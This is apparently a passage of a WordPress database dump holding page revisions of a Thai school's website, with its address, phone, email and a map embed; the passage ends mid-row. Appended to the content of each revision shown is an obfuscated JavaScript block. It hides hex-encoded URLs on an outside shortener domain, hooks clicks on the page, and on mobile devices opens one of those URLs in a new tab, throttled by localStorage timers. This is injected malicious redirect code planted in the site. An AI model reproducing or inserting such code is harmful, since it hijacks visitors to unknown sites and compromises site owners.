{\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-06 21:49:03','2024-08-06 14:49:03','',14,'http://pakhaeng.ssk.in.th/?p=574',0,'revision','',0),
(576,1,'2024-08-06 21:55:04','2024-08-06 14:55:04','<!-- wp:heading {\"level\":1,\"style\":{\"elements\":{\"link\":{\"color\":{\"text\":\"var:preset|color|white\"}}}},\"backgroundColor\":\"luminous-vivid-orange\",\"textColor\":\"white\",\"fontSize\":\"small\"} -->\n<h1 class=\"wp-block-heading has-white-color has-luminous-vivid-orange-background-color has-text-color has-background has-link-color has-small-font-size\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\">แผนที่ตั้ง</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\"></a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3c91321e\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"72b5dc91\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f570a6dd\",\"isGrid\":true,\"gridId\":\"72b5dc91\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"e888c6d0\",\"isGrid\":true,\"gridId\":\"72b5dc91\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"797acfeb\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-797acfeb gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong><br>ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลการติดต่อหน่วยงาน','','inherit','closed','closed','','362-revision-v1','','','2024-08-06 21:55:04','2024-08-06 14:55:04','',362,'http://pakhaeng.ssk.in.th/?p=576',0,'revision','',0),
(578,1,'2024-08-06 21:56:42','2024-08-06 14:56:42','<!-- wp:heading {\"level\":1,\"style\":{\"elements\":{\"link\":{\"color\":{\"text\":\"var:preset|color|white\"}}}},\"backgroundColor\":\"luminous-vivid-orange\",\"textColor\":\"white\",\"fontSize\":\"small\"} -->\n<h1 class=\"wp-block-heading has-white-color has-luminous-vivid-orange-background-color has-text-color has-background has-link-color has-small-font-size\"><strong>โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></h1>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 96 หมู่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ 33250</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>หมายเลขโทรศัพท์ :093-325-2659</li>\n<!-- /wp:list-item -->\n\n<!-- wp:list-item -->\n<li>E-mail : 33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list -->\n\n<!-- wp:buttons -->\n<div class=\"wp-block-buttons\"><!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color has-background wp-element-button\" style=\"border-radius:13px\"><strong>แผนที่ตั้ง</strong></a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {\"backgroundColor\":\"pale-pink\",\"width\":50,\"style\":{\"border\":{\"radius\":\"13px\"}}} -->\n<div class=\"wp-block-button has-custom-width wp-block-button__width-50\"><a class=\"wp-block-button__link has-pale-pink-background-color 